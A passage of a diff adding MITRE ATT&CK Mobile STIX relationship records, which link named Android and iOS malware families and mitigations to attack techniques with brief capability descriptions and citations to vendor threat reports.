"attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ece70dca-803c-4209-8792-7e56e9901288", + "created": "2020-07-15T20:20:59.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:38:15.470Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can delete all data from an infected device.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--dfe6d454-1a24-4c42-97eb-4ddfd1dbb09b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.144Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) has the capability to exploit several known vulnerabilities and escalate privileges.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cde60121-3d7c-47c8-abeb-582854425599", + "type": "relationship", + "created": "2020-07-20T13:27:33.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.531Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can update the running malware.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e723d78f-b6c3-4ba5-8946-b44e651834e3", + "created": "2023-03-16T13:32:02.290Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:32:02.290Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--13518e48-bb32-4ee3-9cd0-e5f367a2fb2d", + "created": "2019-10-18T14:50:57.491Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates often contain patches for vulnerabilities.", + "modified": "2022-03-30T15:52:58.256Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a32db277-593f-4fd1-bdcb-9f677b1a05e1", + "type": "relationship", + "created": "2020-06-26T14:55:13.289Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.289Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can abuse Android’s accessibility service to capture data from installed applications.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10c07066-df05-4dff-bb95-c76be02ea4ef", + "created": "2020-09-14T14:13:45.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:30:00.975Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) imposes geo-restrictions when delivering the second stage.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8570b7ef-a84d-480e-b1ca-b15f15d12103", + "created": "2019-09-23T13:36:08.341Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:58:27.974Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can communicate with the command and control server using JSON payloads sent in HTTP POST request bodies. It can also communicate by using JSON messages sent through Google Cloud Messaging.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f2d05b16-3565-453e-9fbb-1c02146e17e1", + "created": "2020-06-26T15:32:25.002Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can record keystrokes.(Citation: Threat Fabric Cerberus)", + "modified": "2022-04-15T17:33:17.868Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4", + "type": "relationship", + "created": "2019-09-03T19:45:48.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.117Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can obtain a list of installed applications.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b7652f27-1cf6-4310-bf6b-5fb99c4fd725", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) has the ability to record audio.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1b633efc-762f-47f9-96c3-d08ba92e0e3e", + "created": "2022-04-01T17:05:56.046Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "On Android 11 and up, users are not prompted with the option to select “Allow all the time” and must navigate to the settings page to manually select this option. On iOS 14 and up, users can select whether to provide Precise Location for each installed application. ", + "modified": "2022-04-01T17:05:56.046Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--faff9f9c-9064-4b3a-bdf9-bbeced2447a6", + "created": "2020-09-11T16:22:03.266Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:34.466Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect SMS messages.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7bf2e05e-496f-49d1-8a37-48cc3ff8d6cc", + "created": "2020-04-08T15:41:19.400Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cofense Anubis", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020.", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:17:41.320Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can modify administrator settings and disable Play Protect.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ca486783-9413-4f39-8d2f-3adcb3e79127", + "type": "relationship", + "created": "2020-12-24T21:55:56.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.657Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used an AES encrypted file in the assets folder with an unsuspecting name (e.g. ‘GoogleMusic.png’) for holding configuration and C2 information.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--56758bb5-230e-43ac-9851-167c296c3dfa", + "created": "2023-03-20T18:38:27.730Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:38:27.730Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2621a020-8d4f-4ca4-b874-0be336a8cafd", + "type": "relationship", + "created": "2020-04-08T18:55:29.196Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020.", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "source_name": "Cofense Anubis" + } + ], + "modified": "2020-04-09T16:45:38.751Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) exfiltrates data encrypted (with RC4) by its ransomware module.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7ef9f4cf-863b-4bc4-bdaf-55055263c030", + "created": "2022-03-30T20:42:04.251Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised to be extra scrutinous of applications that request location, and to deny any permissions requests for applications they do not recognize.", + "modified": "2022-03-30T20:42:04.251Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--875dc21d-92c3-45bf-be37-faa44f4449bf", + "created": "2020-06-02T14:32:31.891Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:51:44.262Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device’s contact list.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9814ecd5-911a-4776-9dc0-4a4ae0bf6a39", + "type": "relationship", + "created": "2020-04-08T15:41:19.364Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:41:19.364Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can take screenshots.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d3e52467-d090-4ebd-b9b1-3022cc6d5df0", + "created": "2023-02-06T19:42:34.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:08:03.095Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can resist removal by going to the home screen during uninstall.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5a7295a2-ad95-4362-8b2c-9265ad5c73b0", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uses commands received from text messages for C2.(Citation: Lookout-StealthMango)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--76cc66f4-ce85-4873-a63e-879b4a14a540", + "created": "2023-03-03T16:23:20.764Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:23:20.764Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has connected to the C2 server via HTTP.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65acbbe2-48e1-4fba-a781-39fb040a711d", + "type": "relationship", + "created": "2019-09-03T19:45:48.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.178Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) One, after checking in, sends a POST request and then downloads [Exodus](https://attack.mitre.org/software/S0405) Two, the second stage binaries.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f95fec2e-f5cf-49c9-8e0b-1c6c5fd15d8f", + "created": "2019-10-18T14:50:57.494Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates often contain patches for vulnerabilities.", + "modified": "2022-04-11T14:26:44.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--05243ccb-0aeb-4db4-bb03-51a65fb715ab", + "created": "2020-09-11T14:54:16.589Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can be controlled using SMS messages.(Citation: Lookout Desert Scorpion)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7b679dbf-4e31-4d0b-9e13-eb8c3b98b7fb", + "created": "2019-08-09T16:19:02.782Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android Capture Sensor 2019", + "url": "https://developer.android.com/about/versions/pie/android-9.0-changes-all#bg-sensor-access", + "description": "Android Developers. (, January). Android 9+ Privacy Changes . Retrieved August 27, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 9 and above restricts access to microphone, camera, and other sensors from background applications.(Citation: Android Capture Sensor 2019) ", + "modified": "2022-04-01T15:21:13.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 